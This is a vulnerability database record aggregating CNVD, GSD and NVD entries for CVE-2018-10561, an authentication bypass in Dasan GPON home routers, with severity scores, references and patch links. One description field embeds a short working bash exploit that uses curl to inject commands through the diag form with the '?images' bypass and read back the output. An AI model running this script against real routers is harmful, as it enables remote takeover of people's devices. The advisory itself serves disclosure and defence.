            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2018-09230",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "VHN-120333",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2018-10561",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2018-10561",
            "trust": 1.8,
            "value": "CRITICAL"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2018-09230",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201805-189",
            "trust": 0.6,
            "value": "CRITICAL"
          },
          {
            "author": "VULHUB",
            "id": "VHN-120333",
            "trust": 0.1,
            "value": "HIGH"
          },
          {
            "author": "VULMON",
            "id": "CVE-2018-10561",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-09230"
      },
      {
        "db": "VULHUB",
        "id": "VHN-120333"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-10561"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004885"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-10561"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-189"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \"?images\" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device. Dasan GPON home router Contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. An attacker could exploit the vulnerability by bypassing the vulnerability by adding \\342\\200\\230?images\\342\\200\\231 to any of the device\u0027s URLs. Multiple Dasan GPON Routers is prone to an authentication-bypass vulnerability and a command-injection vulnerability. \nAn attacker can exploit these issues to bypass authentication or execute arbitrary commands in the context of the affected device. #!/bin/bash\n \necho \"[+] Sending the Commanda| \"\n# We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices\ncurl -k -d \"XWebPageName=diag\u0026diag_action=ping\u0026wan_conlist=0\u0026dest_host=\\`$2\\`;$2\u0026ipv=0\" $1/GponForm/diag_Form?images/ 2\u003e/dev/null 1\u003e/dev/null\necho \"[+] Waitinga|.\"\nsleep 3\necho \"[+] Retrieving the ouputa|.\"\ncurl -k $1/diag.html?images/ 2\u003e/dev/null | grep adiag_result = a | sed -e as/\\\\n/\\n/ga\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2018-10561"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004885"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-09230"
      },
      {
        "db": "BID",
        "id": "107053"
      },
      {
        "db": "VULHUB",
        "id": "VHN-120333"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-10561"
      },
      {
        "db": "PACKETSTORM",
        "id": "147482"
      }
    ],
    "trust": 2.7
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-120333",
        "trust": 0.1,
        "type": "unknown"
      },
      {
        "reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=44576",
        "trust": 0.1,
        "type": "exploit"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-120333"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-10561"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2018-10561",
        "trust": 3.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "44576",
        "trust": 3.2
      },
      {
        "db": "BID",
        "id": "107053",
        "trust": 2.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004885",
        "trust": 0.8
      },
      {
        "db": "EXPLOITDB",
        "id": "44576",
        "trust": 0.6
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-09230",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-189",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "147482",
        "trust": 0.2
      },
      {
        "db": "VULHUB",
        "id": "VHN-120333",
        "trust": 0.1
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-10561",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-09230"
      },
      {
        "db": "VULHUB",
        "id": "VHN-120333"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-10561"
      },
      {
        "db": "BID",
        "id": "107053"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004885"
      },
      {
        "db": "PACKETSTORM",
        "id": "147482"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-10561"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-189"
      }
    ]
  },
  "id": "VAR-201805-0262",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-09230"
      },
      {
        "db": "VULHUB",
        "id": "VHN-120333"
      }
    ],
    "trust": 1.7
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-09230"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:56:59.540000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.dasannetworks.com/en/"
      },
      {
        "title": "GPONHomeRouters security bypass vulnerability patch",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/128597"
      },
      {
        "title": "Dasan GPON Home router security vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=79885"
      },
      {
        "title": "Brocade Security Advisories: BSA-2018-603",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=brocade_security_advisories\u0026qid=b192ae1777abead866cbeb7d8a56bb12"
      },
      {
        "title": "GPON",
        "trust": 0.1,
        "url": "https://github.com/manyunya/gpon "
      },
      {
        "title": "GPON",
        "trust": 0.1,
        "url": "https://github.com/ethicalhackeragnidhra/gpon "
      },
      {
        "title": "CVE-2018-10562",
        "trust": 0.1,
        "url": "https://github.com/atpiu/cve-2018-10562 "
      },
      {
        "title": "GPON-home-routers-Exploit",
        "trust": 0.1,
        "url": "https://github.com/vhackor/gpon-home-routers-exploit "
      },
      {
        "title": "GPON",
        "trust": 0.1,
        "url": "https://github.com/f3d0x0/gpon "
      },
      {
        "title": "GPON",
        "trust": 0.1,
        "url": "https://github.com/truongnn92/gpon "
      },
      {
        "title": "underattack-py",
        "trust": 0.1,
        "url": "https://github.com/underattack-today/underattack-py "
      },
      {
        "title": "Sniper",
        "trust": 0.1,
        "url": "https://github.com/samba234/sniper "
      },
      {
        "title": "Kn0ck",
        "trust": 0.1,
        "url": "https://github.com/telnet22/kn0ck "
      },
      {
        "title": "Sn1per",
        "trust": 0.1,
        "url": "https://github.com/unusualwork/sn1per "
      },
      {
        "title": "Sn1per",
        "trust": 0.1,
        "url": "https://github.com/oneplus-x/sn1per "
      },
      {
        "title": "api.greynoise.io",
        "trust": 0.1,
        "url": "https://github.com/greynoise-intelligence/api.greynoise.io "
      },
      {
        "title": "Exp101tsArchiv30thers",
        "trust": 0.1,
        "url": "https://github.com/nu11secur1ty/exp101tsarchiv30thers "
      },
      {
        "title": "awesome-cve-poc_qazbnm456",
        "trust": 0.1,
        "url": "https://github.com/xbl3/awesome-cve-poc_qazbnm456 "
      },
      {
        "title": "PoC-in-GitHub",
        "trust": 0.1,
        "url": "https://github.com/hectorgie/poc-in-github "
      },
      {
        "title": "CVE-POC",
        "trust": 0.1,
        "url": "https://github.com/0xt11/cve-poc "
      },
      {
        "title": "PoC-in-GitHub",
        "trust": 0.1,
        "url": "https://github.com/nomi-sec/poc-in-github "
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/gafgyt-botnet-ddos-mirai/165424/"
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/d-link-iot-tor-gafgyt-variant/164529/"
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/inside-hoaxcalls-botnet-success-failure/156107/"
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/wicked-botnet-uses-passel-of-exploits-to-target-iot/132125/"
      },
      {
        "title": "BleepingComputer",
        "trust": 0.1,
        "url": "https://www.bleepingcomputer.com/news/security/gpon-routers-attacked-with-new-zero-day/"
      },
      {
        "title": "Threatpost",
        "trust": 0.1,
        "url": "https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-09230"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-10561"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004885"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-189"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-287",
        "trust": 1.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-120333"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004885"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-10561"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 3.3,
        "url": "https://www.exploit-db.com/exploits/44576/"
      },
      {
        "trust": 2.5,
        "url": "http://www.securityfocus.com/bid/107053"
      },
      {
        "trust": 2.1,
        "url": "https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/"
      },
      {
        "trust": 0.9,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10561"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10561"
      },
      {
        "trust": 0.3,
        "url": "http://www.dasannetworks.com/en/"
      },
      {
        "trust": 0.3,
        "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-603"
      },
      {
        "trust": 0.3,
        "url": "https://www.broadcom.com/support/fibre-channel-networking/security-advisories/brocade-security-advisory-2018-604"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/287.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/manyunya/gpon"
      },
      {
        "trust": 0.1,
        "url": "https://github.com/atpiu/cve-2018-10562"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-10562"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-09230"
      },
      {
        "db": "VULHUB",
        "id": "VHN-120333"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-10561"
      },
      {
        "db": "BID",
        "id": "107053"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004885"
      },
      {
        "db": "PACKETSTORM",
        "id": "147482"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-10561"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-189"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-09230"
      },
      {
        "db": "VULHUB",
        "id": "VHN-120333"
      },
      {
        "db": "VULMON",
        "id": "CVE-2018-10561"
      },
      {
        "db": "BID",
        "id": "107053"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004885"
      },
      {
        "db": "PACKETSTORM",
        "id": "147482"
      },
      {
        "db": "NVD",
        "id": "CVE-2018-10561"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-189"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-05-10T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-09230"
      },
      {
        "date": "2018-05-04T00:00:00",
        "db": "VULHUB",
        "id": "VHN-120333"
      },
      {
        "date": "2018-05-04T00:00:00",
        "db": "VULMON",
        "id": "CVE-2018-10561"
      },
      {
        "date": "2019-02-18T00:00:00",
        "db": "BID",
        "id": "107053"
      },
      {
        "date": "2018-06-29T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-004885"
      },
      {
        "date": "2018-05-04T00:32:22",
        "db": "PACKETSTORM",
        "id": "147482"
      },
      {
        "date": "2018-05-04T03:29:00.227000",
        "db": "NVD",
        "id": "CVE-2018-10561"
      },
      {
        "date": "2018-05-07T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201805-189"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2018-05-10T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2018-09230"
      },
      {
        "date": "2019-03-04T00:00:00",
        "db": "VULHUB",
        "id": "VHN-120333"
      },
      {
        "date": "2019-03-04T00:00:00",
        "db": "VULMON",
        "id": "CVE-2018-10561"
      },
      {
        "date": "2019-02-18T00:00:00",
        "db": "BID",
        "id": "107053"
      },
      {
        "date": "2018-06-29T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2018-004885"
      },
      {
        "date": "2019-03-04T18:39:11.630000",
        "db": "NVD",
        "id": "CVE-2018-10561"
      },
      {
        "date": "2019-02-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201805-189"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-189"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Dasan GPON home router Authentication vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2018-004885"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "authorization issue",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201805-189"
      }
    ],
    "trust": 0.6
  }
}

CNVD-2018-09230

Vulnerability from cnvd - Published: 2018-05-10

Title

GPON Home Routers安全绕过漏洞

Description

Dasan GPON是韩国Dasan公司的一款家用路由器产品。 Dasan GPON家庭路由器中存在安全漏洞。攻击者可通过向设备的任意URL添加‘?images’利用该漏洞绕过身份验证。

Severity

高

Patch Name

GPON Home Routers安全绕过漏洞的补丁

Patch Description

Dasan GPON是韩国Dasan公司的一款家用路由器产品。 Dasan GPON家庭路由器中存在安全漏洞。攻击者可通过向设备的任意URL添加‘?images’利用该漏洞绕过身份验证。目前，供应商发布了安全公告及相关补丁信息，修复了此漏洞。

Formal description

目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页： http://www.dasannetworks.com

Reference

https://www.exploit-db.com/exploits/44576/

Impacted products

Name
DASAN Networks GPON

Show details on source website

JSON

To clipboard

{
  "cves": {
    "cve": {
      "cveNumber": "CVE-2018-10561"
    }
  },
  "description": "Dasan GPON\u662f\u97e9\u56fdDasan\u516c\u53f8\u7684\u4e00\u6b3e\u5bb6\u7528\u8def\u7531\u5668\u4ea7\u54c1\u3002\r\n\r\nDasan GPON\u5bb6\u5ead\u8def\u7531\u5668\u4e2d\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u901a\u8fc7\u5411\u8bbe\u5907\u7684\u4efb\u610fURL\u6dfb\u52a0\u2018?images\u2019\u5229\u7528\u8be5\u6f0f\u6d1e\u7ed5\u8fc7\u8eab\u4efd\u9a8c\u8bc1\u3002",
  "discovererName": "vpnmentor",
  "formalWay": "\u76ee\u524d\u5382\u5546\u5df2\u53d1\u5e03\u5347\u7ea7\u8865\u4e01\u4ee5\u4fee\u590d\u6f0f\u6d1e\uff0c\u8be6\u60c5\u8bf7\u5173\u6ce8\u5382\u5546\u4e3b\u9875\uff1a\r\nhttp://www.dasannetworks.com",
  "isEvent": "\u901a\u7528\u8f6f\u786c\u4ef6\u6f0f\u6d1e",
  "number": "CNVD-2018-09230",
  "openTime": "2018-05-10",
  "patchDescription": "Dasan GPON\u662f\u97e9\u56fdDasan\u516c\u53f8\u7684\u4e00\u6b3e\u5bb6\u7528\u8def\u7531\u5668\u4ea7\u54c1\u3002\r\n\r\nDasan GPON\u5bb6\u5ead\u8def\u7531\u5668\u4e2d\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\u653b\u51fb\u8005\u53ef\u901a\u8fc7\u5411\u8bbe\u5907\u7684\u4efb\u610fURL\u6dfb\u52a0\u2018?images\u2019\u5229\u7528\u8be5\u6f0f\u6d1e\u7ed5\u8fc7\u8eab\u4efd\u9a8c\u8bc1\u3002 \u76ee\u524d\uff0c\u4f9b\u5e94\u5546\u53d1\u5e03\u4e86\u5b89\u5168\u516c\u544a\u53ca\u76f8\u5173\u8865\u4e01\u4fe1\u606f\uff0c\u4fee\u590d\u4e86\u6b64\u6f0f\u6d1e\u3002",
  "patchName": "GPON Home Routers\u5b89\u5168\u7ed5\u8fc7\u6f0f\u6d1e\u7684\u8865\u4e01",
  "products": {
    "product": "DASAN Networks GPON"
  },
  "referenceLink": "https://www.exploit-db.com/exploits/44576/",
  "serverity": "\u9ad8",
  "submitTime": "2018-05-02",
  "title": "GPON Home Routers\u5b89\u5168\u7ed5\u8fc7\u6f0f\u6d1e"
}

GSD-2018-10561

Vulnerability from gsd - Updated: 2023-12-13 01:22

Details

Aliases

CVE-2018-10561

Aliases

CVE-2018-10561

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2018-10561",
    "description": "An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \"?images\" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device.",
    "id": "GSD-2018-10561",
    "references": [
      "https://packetstormsecurity.com/files/cve/CVE-2018-10561"
    ]
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2018-10561"
      ],
      "details": "An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \"?images\" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device.",
      "id": "GSD-2018-10561",
      "modified": "2023-12-13T01:22:40.961209Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cisa.gov": {
      "cveID": "CVE-2018-10561",
      "dateAdded": "2022-03-31",
      "dueDate": "2022-04-21",
      "product": "Gigabit Passive Optical Network (GPON) Routers",
      "requiredAction": "The impacted product is end-of-life and should be disconnected if still in use.",
      "shortDescription": "Dasan GPON Routers contain an authentication bypass vulnerability. When combined with CVE-2018-10562, exploitation can allow an attacker to perform remote code execution.",
      "vendorProject": "Dasan",
      "vulnerabilityName": "Dasan GPON Routers Authentication Bypass Vulnerability"
    },
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "cve@mitre.org",
        "ID": "CVE-2018-10561",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "n/a",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "n/a"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "n/a"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \"?images\" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device."
          }
        ]
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "n/a"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "107053",
            "refsource": "BID",
            "url": "http://www.securityfocus.com/bid/107053"
          },
          {
            "name": "44576",
            "refsource": "EXPLOIT-DB",
            "url": "https://www.exploit-db.com/exploits/44576/"
          },
          {
            "name": "https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/",
            "refsource": "MISC",
            "url": "https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/"
          }
        ]
      }
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:dasannetworks:gpon_router:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2018-10561"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "An issue was discovered on Dasan GPON home routers. It is possible to bypass authentication simply by appending \"?images\" to any URL of the device that requires authentication, as demonstrated by the /menu.html?images/ or /GponForm/diag_FORM?images/ URI. One can then manage the device."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-287"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Technical Description",
                "Third Party Advisory"
              ],
              "url": "https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/"
            },
            {
              "name": "44576",
              "refsource": "EXPLOIT-DB",
              "tags": [
                "Exploit",
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "https://www.exploit-db.com/exploits/44576/"
            },
            {
              "name": "107053",
              "refsource": "BID",
              "tags": [
                "Third Party Advisory",
                "VDB Entry"
              ],
              "url": "http://www.securityfocus.com/bid/107053"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": true,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "integrityImpact": "PARTIAL",
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 6.4,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "HIGH",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2019-03-04T18:39Z",
      "publishedDate": "2018-05-04T03:29Z"
    }
  }
}

FKIE_CVE-2018-10561

Vulnerability from fkie_nvd - Published: 2018-05-04 03:29 - Updated: 2025-11-05 19:23

Severity ?

9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
9.8 (Critical) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
cve@mitre.org	http://www.securityfocus.com/bid/107053	Broken Link, Third Party Advisory, VDB Entry
cve@mitre.org	https://www.exploit-db.com/exploits/44576/	Exploit, Third Party Advisory, VDB Entry
cve@mitre.org	https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/	Exploit, Technical Description, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	http://www.securityfocus.com/bid/107053	Broken Link, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://www.exploit-db.com/exploits/44576/	Exploit, Third Party Advisory, VDB Entry
af854a3a-2127-422b-91ae-364da2661108	https://www.vpnmentor.com/blog/critical-vulnerability-gpon-router/	Exploit, Technical Description, Third Party Advisory
134c704f-9b21-4f2e-91b3-4a467353bcc0	https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2018-10561	US Government Resource

Impacted products

	Vendor	Product	Version
	dasannetworks	gpon_router_firmware	-
	dasannetworks	gpon_router	-

JSON

To clipboard

{
  "cisaActionDue": "2022-04-21",
  "cisaExploitAdd": "2022-03-31",
  "cisaRequiredAction": "The impacted product is end-of-life and should be disconnected if still in use.",
  "cisaVulnerabilityName": "Dasan GPON Routers Authentication Bypass Vulnerability",
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dasannetworks:gpon_router_firmware:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "8153A5BC-B257-4774-8106-E77FA2239A99",
              "vulnerable": true
